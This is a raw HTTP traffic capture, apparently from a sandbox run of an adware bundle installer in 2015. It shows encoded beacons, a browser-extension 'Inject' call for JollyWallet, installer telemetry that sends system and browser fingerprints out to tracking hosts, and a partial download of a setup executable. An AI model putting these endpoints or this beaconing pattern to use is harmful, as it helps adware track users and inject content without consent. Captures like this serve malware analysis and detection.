GET /app/ping.ashx?e=c0XmKevqA0n9yuFJumnxsiS DXErth A 0R MP RL3VKgFoRkIu6RpNh8S9i4d0Hnb22gmYS8RsDllQ9J4QRpkb2k6Rn898YXCSgtUXqN5/aaUzToxOfiz0mbos5SmUuL1RonSUM0G8HF9ed47qLJdLkq GrncHeyXBDP8Ld0 yRF51HAH62ECVvD8H/vspbe9//dIyd3GGG7NLJhlXAptjP1QedMB/cy/B6ujnJrtI0fJ30mPWB3MJ9BqBjylb5Bjt6DgsNnxOwUbmkSx2157mT/v0ajD3y HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: repjs.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:41 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/7.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 18 Apr 20
15 23:35:41 GMT..Content-Length: 0......


GET /app/ping.ashx?e=KSz5qzb2KgLn7OfBI/VPcf3K4Um6afGye03i94NAiM/7RH4w/5EvdUqAWhGQi7pGk2HxL2Lh3QcuaAaDgF1REpvc5fUfFrFJRvaTpGfz3xhcJKC1Reo3n9ppTNOjE5 LPSZuizlKZS4vVGidJQzQbwcX153juosl0uSr4audwd7JcEM/wt3T7JEXnUcAfrYQJW8Pwf  ylt73/90jJ3cYYbs0smGVcCm2M/VB50wH9zL8Hq6Ocmu0jR8nfSY9YHcwn0GoGPKVvkGO3oOCw2fE7BRuaRLHbXnuZP /RqMPfI= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: repjs.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:41 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/7.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 18 Apr 20
15 23:35:41 GMT..Content-Length: 0......


GET /app/ping.ashx?e=PcwT4QFtuPClUB4b/muCJQ2omNS/TGQz62ls PLHCLDT03ZwnpMmri4u 59fITlqw48A36x6z/KZIUDDHMapm6716HWP7Hb1hjZ3jwf MfnewapHV13X4PiY0VDEtXdazBaKXaEKdzFwqwK4Z/LB/gEuwwpt2SWXC/H/dL1Z3VIip4wN1YzN4vCUkFiosfAG2KwI4GpE9wLRXIwnBzB2/3N4YHUtLPnXNp0Ch2ZhfpvG4Lnbcm9hh1KSSkgkzJM10ClxJsX5qO1ZySIyJVh8lyiuy5/oVLbn9609pFHvExuwUbmkSx21501BK/ ntU4rG62wGX5XNu/pZ/pzprFy4hjGhmacv1G uLVTO15bsS9eEKXCI1fi6Q== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: repjs.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:42 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/7.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 18 Apr 20
15 23:35:42 GMT..Content-Length: 0..



GET /app/ping.ashx?e=ZuS0/O3oV2pBhrP9twY3lDDlic64H1m3swOQ QJVkEHykjeeMFQEgOIu4Zx3YXXHbkP33eKXEVDuckMp0VGSOWNPI2OPMQSa8OW8dQbOsF8TmouIR1qWdOQVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlBRsXHd/3niy&product=EXTFirefox&rnd=1429400150&it=0&action=Init&text=Ext version: 1.0.0.4. Firefox version: 29.0.1. DB name: database1_0_0.json. DB version: 1.0.1.4 HTTP/1.1
Host: rep.shopper-pro.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:49 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=ZuS0/O3oV2pBhrP9twY3lDDlic64H1m3swOQ QJVkEHykjeeMFQEgOIu4Zx3YXXHbkP33eKXEVDuckMp0VGSOWNPI2OPMQSa8OW8dQbOsF8TmouIR1qWdOQVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlBRsXHd/3niy&product=EXTFirefox&rnd=1429400150&it=0&action=Inject&text=JollyWallet HTTP/1.1


Host: rep.shopper-pro.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:49 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/8.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 18 Apr 20
15 23:35:49 GMT..Content-Length: 0..



GET /12767.ashx?e=wlkQ3WKgYpRPNjxRBLtb449we4XQqEV6/WD6e6SZIIHeyzV7AofXlhYwsCIys4jFl9RbU5Ar lxObnHKVsttiOLt6BhzfOsD0FbaakihgO1P17LdzRwGrcSywkF18Bl8YJpucY5gZaR711If7ZLdKSAZ5SkcchaJJJ9Fy4h9HR9S7QojUgCmBeLyj8PdRsUbWGOnOu3i3XawADzuWvml5Co96KQrvxHzFtz73aJdyQ8sj2VHenQSi 0LhpxXD4t4eCmOKii sWodZTjDiKj8nmywgV52R4NzBT4DqSJhyM3mODCqGlX7dFUAApkcaIS g 3gvHMozU99ecNw3qM44/lSIKq0UdoUdMm3hqMstJ/y06twORtLg9fHR9A6p3upOM0S4XWXQNckrM9d9qKvEHSoZq9bNUnidXu6HZZj G6u8rYnA8EzX4JIE87/jfWsid6KRE16wYsqtKrDF7mr6U IgqjBtPrQZNslBbwbrzm8HqzDlA5LEOcQDW2ub8rgHR1BOlQeSG TPkAVkd2bb1HMP2IfnNA/cEXCuD7ISRf2T mvjIH/Ay5ismV6Zmv0elWnPCijCkMjOCgw2BVJml3HgtDvmRKdu9i5y3Idvu/iLuGcd2F1x25D993ilxFQ7nJDKdFRkjljTyNjjzEEmvfwqbgkyABd HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:38 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:38 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..



GET /root-r3.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.globalsign.net


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:38:23 GMT
Content-Type: application/x-pkcs7-crl
Content-Length: 594
Connection: keep-alive
Set-Cookie: __cfduid=dc679f93893e4280fbd0aafe036e7b7ae1429400303; expires=Sun, 17-Apr-16 23:38:23 GMT; path=/; domain=.globalsign.net; HttpOnly
Expires: Wed, 15 Jul 2015 00:00:00 GMT
Last-Modified: Mon, 23 Mar 2015 00:00:00 GMT
Cache-Control: public, max-age=7518097
CF-Cache-Status: HIT
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 1d9433f8d4f408b1-FRA
0..N0..6...0...*.H........0L1 0...U....GlobalSign Root CA - R31.0...U.
...GlobalSign1.0...U....GlobalSign..150323000000Z..150715000000Z0..0*.
.......1..F...141125000000Z0.0...U.......0*........%[email protected]
Z0.0...U.......0*........%..D...141125000000Z0.0...U......../0-0...U..
.....0...U.#..0.....K...E$.MP.c.......0...*.H...............Z.v..&...B
.....x)....'.u.}.r8.. ..i.......-..........@.:.5.v..?.. ....~V.=....R.
 .....rS....t.T_.....Y.R......p OS..2.s........(C.e.x3.#.d6L.d=.UI.;T.
.G...mx....... .......-........-.....J....$.Ko.e#......3....*..3.s...0
.........N..W?'.U...f..h..e...m.9.HTTP/1.1 200 OK..Date: Sat, 18 Apr 2
015 23:38:23 GMT..Content-Type: application/x-pkcs7-crl..Content-Lengt
h: 594..Connection: keep-alive..Set-Cookie: __cfduid=dc679f93893e4280f
bd0aafe036e7b7ae1429400303; expires=Sun, 17-Apr-16 23:38:23 GMT; path=
/; domain=.globalsign.net; HttpOnly..Expires: Wed, 15 Jul 2015 00:00:0
0 GMT..Last-Modified: Mon, 23 Mar 2015 00:00:00 GMT..Cache-Control: pu
blic, max-age=7518097..CF-Cache-Status: HIT..Accept-Ranges: bytes..Ser
ver: cloudflare-nginx..CF-RAY: 1d9433f8d4f408b1-FRA..0..N0..6...0...*.
H........0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0.
..U....GlobalSign..150323000000Z..150715000000Z0..0*........1..F...141
125000000Z0.0...U.......0*........%[email protected]*
........%..D...141125000000Z0.0...U......../0-0...U.......0...U.#..0..
...K...E$.MP.c.......0...*.H...............Z.v..&...B.....x)....'.u.}.
r8.. ..i.......-..........@.:.5.v..?.. ....~V.=....R. .....rS....t
<<< skipped >>>


GET /12767.ashx?e=wlkQ3WKgYpRPNjxRBLtb449we4XQqEV6/WD6e6SZIIHeyzV7AofXlhYwsCIys4jFl9RbU5Ar lxObnHKVsttiOLt6BhzfOsDBXnWkuh5LzaUfdGpw3nUglF9z0WypnnGstnhkcefCVXiLuGcd2F1x25D993ilxFQ7nJDKdFRkjljTyNjjzEEmvfwqbgkyABd HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:38 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:38 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......



GET /youtube_accelerator/wizardtest/SMALLTEST.HTM?random=583100&mode=nolsp HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: test.youtubeaccelerator.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Mon, 21 Jul 2008 09:41:32 GMT
Accept-Ranges: bytes
ETag: "bfefaff515ebc81:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:54 GMT
Content-Length: 167
.............`.I.%&/m.{.J.J..t...`[email protected]#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?".......~....O......7.O.........
....'_>.}. ..>..o.?...MF.....



GET /installer.gif?action=started&app=70299&appver=0&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C8E047339716492CBFDDEC56F18A5922PI&srcid=000805&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl3c210eWMxLCUlUElYR1VJRChhZmY9c210eWMmc3ViPTEmcHJvZHVjdD15dGE=,&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_36&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=17179873281&asw=0&asw2=1073750533&asw3=-2147475456&asw4=2048&crtnm=na&mdat=&procstarttime=1429400147&procruntime=3&rnd=1429400150 HTTP/1.1
Host: stats.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: VS1CjDpGPIR0Q2ZAwslvKGVoNGDN0GC3JfTPzKHCfPu00Da36WwmxiiBoZOv0qO7
x-amz-request-id: B0D287711B490EBA
Date: Sat, 18 Apr 2015 23:35:51 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:56 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: VS1CjD
pGPIR0Q2ZAwslvKGVoNGDN0GC3JfTPzKHCfPu00Da36WwmxiiBoZOv0qO7..x-amz-requ
est-id: B0D287711B490EBA..Date: Sat, 18 Apr 2015 23:35:51 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Wed, 01 Apr 2015 13:14:56 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /installer.gif?action=finished&LFMR=_ffDll_0&app=70299&appver=&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C8E047339716492CBFDDEC56F18A5922PI&srcid=000805&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl3c210eWMxLCUlUElYR1VJRChhZmY9c210eWMmc3ViPTEmcHJvZHVjdD15dGE=,&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_36&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=17179873281&asw=0&asw2=1073750533&asw3=-2147475456&asw4=2048&crtnm=na&procstarttime=1429400147&procruntime=14&rnd=1429400161 HTTP/1.1


Host: stats.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: c9Q0dxhSIDNVh7TIavSMvDwesVdETRbPIfkkVhgpJ//pnxOyltwen5FkL08Aw w3
x-amz-request-id: A5E3DA7DE96030F5
Date: Sat, 18 Apr 2015 23:36:02 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:56 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /apps.gif?action=install&app=70299&appver=&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C8E047339716492CBFDDEC56F18A5922PI&srcid=000805&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl3c210eWMxLCUlUElYR1VJRChhZmY9c210eWMmc3ViPTEmcHJvZHVjdD15dGE=,&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&installtime=1429400147&lifetime=0&silent=1&crtnm=na&procstarttime=1429400147&procruntime=14&rnd=1429400161 HTTP/1.1


Host: stats.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: ql4VCU EbrWt0/owhFzrr2NqjumcoW83U97Cz TCnFjZVvgWaWQ3seAN6TQDWq1h
x-amz-request-id: C2A5DB010C1ECE94
Date: Sat, 18 Apr 2015 23:36:02 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:45 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: ql4VCU
 EbrWt0/owhFzrr2NqjumcoW83U97Cz TCnFjZVvgWaWQ3seAN6TQDWq1h..x-amz-requ
est-id: C2A5DB010C1ECE94..Date: Sat, 18 Apr 2015 23:36:02 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Wed, 01 Apr 2015 13:14:45 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;..



GET /monetization.gif?event=3&ibic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&campaign=000820&country=ua&app=65743&os=7(64bit)&defbro=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&starttime=1429400187&asw=0_1082139141_-2147475456_34816&browser=ff&rnd=1429400187 HTTP/1.1
Host: logs.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:36:29 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1429400189.dop018.am4.t,1429400189.cds058.am4.c
GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Sat, 18 Apr 
2015 23:36:29 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-A
live..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07
 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 
35..Content-Type: image/gif..X-HW: 1429400189.dop018.am4.t,1429400189.
cds058.am4.c..GIF89a.............,...........D..;....


GET /monetization.gif?event=4&ibic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&campaign=000820&country=ua&app=65743&os=7(64bit)&defbro=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&starttime=1429400187&asw=0_1082139141_-2147475456_34816&browser=ff&rnd=1429400187 HTTP/1.1


Host: logs.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:36:37 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1429400189.dop018.am4.t,1429400197.cds058.am4.c
GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Sat, 18 Apr 
2015 23:36:37 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-A
live..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07
 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 
35..Content-Type: image/gif..X-HW: 1429400189.dop018.am4.t,1429400197.
cds058.am4.c..GIF89a.............,...........D..;..



GET /sd?is=sm HTTP/1.1
Range: bytes=130818-261636
User-Agent: Better Installer(Mozilla)
Host: install-cdn.theswiftrecord.com
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Pragma: no-cache
Content-Type: application/octet-stream
Server: Microsoft-IIS/7.5
Content-Disposition: attachment; filename=SwiftRecordSetup.exe
X-AspNet-Version: 4.0.30319
SVR: SP004C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Cache-Control: private, max-age=86400
Expires: Sun, 19 Apr 2015 23:35:14 GMT
Date: Sat, 18 Apr 2015 23:35:14 GMT
Content-Range: bytes 130818-261636/523272
Content-Length: 130819
Connection: keep-alive
.Y#./[email protected]}R...;B...,..vgQ4...W..O&..
..=.......s../y.wa.h.0p$.Vf.J...JD..j5..........;...Y.....:k.tT=..x./.
...E..n...........$.s=.....)8p.E....B..c.$..Vj;.,.t.D|6d.B.lp.>Y.C.
........w.^|..Yx.P`N..j.RN.. ...~...Lok.....o..m%`,@,.....J.S...jM@...
..#...J..h..U^...`.RV.,^z..1.d/>?.u.\......{.r.l....M........e.&...
[.6<..M.......h.^...H.)..6.........../.O.]........W}. ...$..x9.9.i.
......)..~..b.T.........f...<8...C..$>YC............t..R.....`.*
[email protected]..`.....i...X.y...1.KQ...w,d.....4Oxn..
..... (....6.MY. .u...".Q.Fn.D..<..o..M.......&ZYJ.b5.24o...M...j..
$...l>.`rlx~..~F6Zh..>..`...i.y..-.e.....2.. ..CCkx...&.g.....j.
.Y......V.5...5.[....z.J.....R..x..u..i...|.....Y.s..-s.1.>...F....
.G...YWH.0.H.... .6=AQ.s.......%..3n.S.,..RY.D%...l.G^..Ny.QMb...>.
.=.1:h8.2.......%.Qv.=.g.i.........{.~.o....5.1g[...._ .C.o.=.....%...
[..[..i....Z/.z..i..UP.......8...sX..Y......iYI...C.(E7..S..9...H,L...
e..^ N.7...x.Qp.J.T....xz}.....&.%...<,. ..{s.=..Vp.........'./....
..Zv9.m..P.f..8....w...`..pJ....>a.'(....s'...l|t.....WO ..)3......
2.....F...@...#.v........29.#..w.-...nN..S"w..b........4.HY.......>
.v..?......>.#..\...sA.......W....^pS.z......9..%Q.l...7.}...[..*&l
t;  rq.L:....[.$7=.=B.mE-......)s..KM...........!..s..xa2...v3..uF...g
O.G'.B.e..-...z#..ck{`.v....`gx....Eg........`[email protected]...'.A....
.Z...LVAQd.q..( ...........6...6....P"..~.9......47..T.....IE..([.S.O.
|o.1{Ue..?C^-................T9P.pb..B#.....0_B....:#....v....8<
<<< skipped >>>


GET /app/ping.ashx?e=657cd9m3NQFPNjxRBLtb4x0oukvXTQfet8f6YpiR28K/M iZRiJnRnHdTB6jkze/avGlMWAqZVF1vusSxtcPBYeCQx1we Asnw T2O19KvsYrNjjnOLU6dbIHx4MCRqKGvMeRdM8NsizZtFUmLk2U6syuDjWX8vLsJJPlhy2jdwTqcwBDTHruXFWs3G3PXIRsFG5pEsdtecdHUE6VB5Ib5M QBWR3ZtvIt9ltQ LwNUfJKZ4NCKSCQ== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
Host: rephelper.youtubeaccelerator.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:35 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/7.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 18 Apr 20
15 23:35:35 GMT..Content-Length: 0......


GET /app/ping.ashx?e=AZwPyJy3TZhPNjxRBLtb45HdX0JUIFUOt8f6YpiR28K/M iZRiJnRnHdTB6jkze/avGlMWAqZVF1vusSxtcPBYeCQx1we AsujghDckn/xgt lphzBReO6bK2Q7GGGnWJ281Et5v 1gpJLLN2z FnwCiBUKcGrTX6nvOi2lZHZeM8MU7L6Z1XFzslN/Oom5DbE2hSZV1srvsrduYhMMj23LymH6HWKlXaBQc7HR56MWNJxXQawroNmbktPzt6FdqlmEIUPwTJ2qmrvcVl0Mf/w== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
Host: rephelper.youtubeaccelerator.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:35 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/7.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 18 Apr 20
15 23:35:35 GMT..Content-Length: 0..



GET /pinger?event_type=offer_accepted&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=istartsurf&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=3&index_in_screen=1&index_in_session=3&0.04203975819833361 HTTP/1.1
Accept: */*
Referer: hXXp://sub.goveba.info/downloader/thetetrisgame/thetetrisgameezsg/4a9fc2e26d3c3249b974ded373db7ae1?v=2.4&uid=4a9fc2e26d3c3249b974ded373db7ae1&muid=AD2252CE007468623BD139B0ADEC3423&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNmEgYjcgOWIgODkgMDggNDUtMjkgNzcgN2UgNDIgNzkgMTMgZmEgZGQgIEhQUU9FTSAtIDYwNDAwMDA&v2=0
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: sub.goveba.info
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/jpeg
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sat, 18 Apr 2015 23:35:11 GMT
Expires: Sat, 18 Apr 2015 20:48:31 GMT
Cache-Control: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 2636148dc4ff819fda62f785a179ffd2.cloudfront.net (CloudFront)
X-Amz-Cf-Id: g0-USP7Evkzoat5oLYyiQ_sIpTmzvHKgWpIwJX0zSIbxzCaPT52GVw==
0..HTTP/1.1 200 OK..Content-Type: image/jpeg..Transfer-Encoding: chunk
ed..Connection: keep-alive..Server: nginx..Date: Sat, 18 Apr 2015 23:3
5:11 GMT..Expires: Sat, 18 Apr 2015 20:48:31 GMT..Cache-Control: no-ca
che..X-Cache: Miss from cloudfront..Via: 1.1 2636148dc4ff819fda62f785a
179ffd2.cloudfront.net (CloudFront)..X-Amz-Cf-Id: g0-USP7Evkzoat5oLYyi
Q_sIpTmzvHKgWpIwJX0zSIbxzCaPT52GVw==..0..



GET /online/ka.aspx?CV=2.0.0.0&ProductID=12000&UserID=e59a543c-07c1-4575-b0a1-b17d7cfac7a7&Password=l6G2E4Yn&OS=10&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1429400137&SBPIDS=1&KA=1 HTTP/1.1
User-Agent: CoreWinInet
Host: online.GOOBZO.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=vkmfd445f45dw155tpmcir55


HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 1266
Content-Type: text/html; charset=utf-8
Location: hXXp://online.speedbit.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=e59a543c-07c1-4575-b0a1-b17d7cfac7a7&Password=l6G2E4Yn&OS=10&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1429400137&SBPIDS=1&KA=1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sat, 18 Apr 2015 23:35:37 GMT
Connection: close
<html><head><title>Object moved</title></he
ad><body>..<h2>Object moved to <a href="hXXp://onlin
e.speedbit.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&U
serID=e59a543c-07c1-4575-b0a1-b17d7cfac7a7&Password=l6G2E4Yn&O
S=10&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c
3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&a
